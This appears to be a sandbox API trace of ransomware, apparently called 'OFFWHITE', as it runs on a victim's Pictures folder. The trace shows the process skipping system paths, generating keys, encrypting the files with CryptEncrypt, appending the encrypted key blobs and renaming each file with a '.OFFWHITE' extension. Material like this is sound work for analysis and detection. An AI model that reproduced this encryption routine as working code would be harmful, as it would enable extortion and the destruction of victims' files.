ftLastWriteTime.dwHighDateTime=0x1d5de32, nFileSizeHigh=0x0, nFileSizeLow=0x47b7, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="S2Z69ozOVHr.jpg", cAlternateFileName="S2Z69O~1.JPG")) returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2=".") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="..") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="...") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="windows") returned -1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="$recycle.bin") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="rsa") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="ntuser.dat") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="programdata") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="appdata") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="program files") returned 1 [0135.787] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="program files (x86)") returned 1 [0135.787] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.787] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="S2Z69ozOVHr.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg" [0135.787] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.787] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.788] PathFindExtensionW (pszPath="S2Z69ozOVHr.jpg") returned=".jpg" [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.788] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.788] lstrcmpiW (lpString1="S2Z69ozOVHr.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.788] GetProcessHeap () returned 0x500000 [0135.788] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f30 [0135.788] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\s2z69ozovhr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.789] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=18359) returned 1 [0135.789] GetProcessHeap () returned 0x500000 [0135.789] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.789] GetProcessHeap () returned 0x500000 [0135.789] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.789] GetProcessHeap () returned 0x500000 [0135.789] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.789] GetProcessHeap () returned 0x500000 [0135.789] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.789] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.789] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.789] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.789] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.789] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.790] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.790] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.790] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.790] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x47b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.790] SetLastError (dwErrCode=0x0) [0135.790] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.792] GetLastError () returned 0x0 [0135.792] GetLastError () returned 0x0 [0135.792] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x48b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.792] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.792] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x49b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.793] WriteFile (in: hFile=0x21c, lpBuffer=0x521f30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521f30*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.793] GetProcessHeap () returned 0x500000 [0135.793] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x47b7) returned 0x55a7b8 [0135.793] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.793] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x47b7, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x47b7, lpOverlapped=0x0) returned 1 [0135.795] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.795] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x47b7, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x47b7, lpOverlapped=0x0) returned 1 [0135.795] GetProcessHeap () returned 0x500000 [0135.795] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.795] CloseHandle (hObject=0x21c) returned 1 [0135.800] GetProcessHeap () returned 0x500000 [0135.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.800] GetProcessHeap () returned 0x500000 [0135.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.800] GetProcessHeap () returned 0x500000 [0135.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.800] GetProcessHeap () returned 0x500000 [0135.800] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.800] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg" [0135.800] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg.OFFWHITE" [0135.800] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\s2z69ozovhr.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\S2Z69ozOVHr.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\s2z69ozovhr.jpg.offwhite")) returned 1 [0135.801] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64368ad0, ftCreationTime.dwHighDateTime=0x1d5e48f, ftLastAccessTime.dwLowDateTime=0x62afb150, ftLastAccessTime.dwHighDateTime=0x1d5d99a, ftLastWriteTime.dwLowDateTime=0x62afb150, ftLastWriteTime.dwHighDateTime=0x1d5d99a, nFileSizeHigh=0x0, nFileSizeLow=0x15ca9, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="sjGrPVv-AkezS.jpg", cAlternateFileName="SJGRPV~1.JPG")) returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2=".") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="..") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="...") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="windows") returned -1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="$recycle.bin") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="rsa") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="ntuser.dat") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="programdata") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="appdata") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="program files") returned 1 [0135.801] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="program files (x86)") returned 1 [0135.801] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.801] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="sjGrPVv-AkezS.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg" [0135.801] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.801] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.801] PathFindExtensionW (pszPath="sjGrPVv-AkezS.jpg") returned=".jpg" [0135.801] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0135.801] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".com") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".cpl") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".url") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".mp3") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".pif") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".mp4") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".OFFWHITE") returned -1 [0135.802] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0135.802] lstrcmpiW (lpString1="sjGrPVv-AkezS.jpg", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0135.802] GetProcessHeap () returned 0x500000 [0135.802] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f40 [0135.802] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\sjgrpvv-akezs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.802] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=89257) returned 1 [0135.803] GetProcessHeap () returned 0x500000 [0135.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.803] GetProcessHeap () returned 0x500000 [0135.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.803] GetProcessHeap () returned 0x500000 [0135.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.803] GetProcessHeap () returned 0x500000 [0135.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.803] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.803] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.803] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.803] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.803] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.804] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15ca9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.804] SetLastError (dwErrCode=0x0) [0135.804] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.807] GetLastError () returned 0x0 [0135.807] GetLastError () returned 0x0 [0135.807] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15da9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.807] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.807] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15ea9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.807] WriteFile (in: hFile=0x21c, lpBuffer=0x521f40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521f40*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.807] GetProcessHeap () returned 0x500000 [0135.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15ca9) returned 0x55a7b8 [0135.807] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.807] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x15ca9, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x15ca9, lpOverlapped=0x0) returned 1 [0135.814] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.814] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x15ca9, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x15ca9, lpOverlapped=0x0) returned 1 [0135.814] GetProcessHeap () returned 0x500000 [0135.814] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.814] CloseHandle (hObject=0x21c) returned 1 [0135.825] GetProcessHeap () returned 0x500000 [0135.825] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.825] GetProcessHeap () returned 0x500000 [0135.825] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.825] GetProcessHeap () returned 0x500000 [0135.825] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.825] GetProcessHeap () returned 0x500000 [0135.825] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.825] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg" [0135.825] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg.OFFWHITE" [0135.825] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\sjgrpvv-akezs.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\sjGrPVv-AkezS.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\sjgrpvv-akezs.jpg.offwhite")) returned 1 [0135.826] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64368ad0, ftCreationTime.dwHighDateTime=0x1d5e48f, ftLastAccessTime.dwLowDateTime=0x62afb150, ftLastAccessTime.dwHighDateTime=0x1d5d99a, ftLastWriteTime.dwLowDateTime=0x62afb150, ftLastWriteTime.dwHighDateTime=0x1d5d99a, nFileSizeHigh=0x0, nFileSizeLow=0x15ca9, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="sjGrPVv-AkezS.jpg", cAlternateFileName="SJGRPV~1.JPG")) returned 0 [0135.826] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0135.826] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843f8b90, ftCreationTime.dwHighDateTime=0x1d5da55, ftLastAccessTime.dwLowDateTime=0x916ffd40, ftLastAccessTime.dwHighDateTime=0x1d5d97e, ftLastWriteTime.dwLowDateTime=0x916ffd40, ftLastWriteTime.dwHighDateTime=0x1d5d97e, nFileSizeHigh=0x0, nFileSizeLow=0x3564, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="HPDFcMjZlwUnIoW.gif", cAlternateFileName="HPDFCM~1.GIF")) returned 1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2=".") returned 1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="..") returned 1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="...") returned 1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="windows") returned -1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="$recycle.bin") returned 1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="rsa") returned -1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="ntuser.dat") returned -1 [0135.826] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="programdata") returned -1 [0135.827] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="appdata") returned 1 [0135.827] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="program files") returned -1 [0135.827] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="program files (x86)") returned -1 [0135.827] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0135.827] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="HPDFcMjZlwUnIoW.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif" [0135.827] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.827] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.827] PathFindExtensionW (pszPath="HPDFcMjZlwUnIoW.gif") returned=".gif" [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.827] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.827] lstrcmpiW (lpString1="HPDFcMjZlwUnIoW.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.827] GetProcessHeap () returned 0x500000 [0135.827] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f50 [0135.828] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HPDFcMjZlwUnIoW.gif" (normalized: "c:\\users\\5p5nrgjn0js 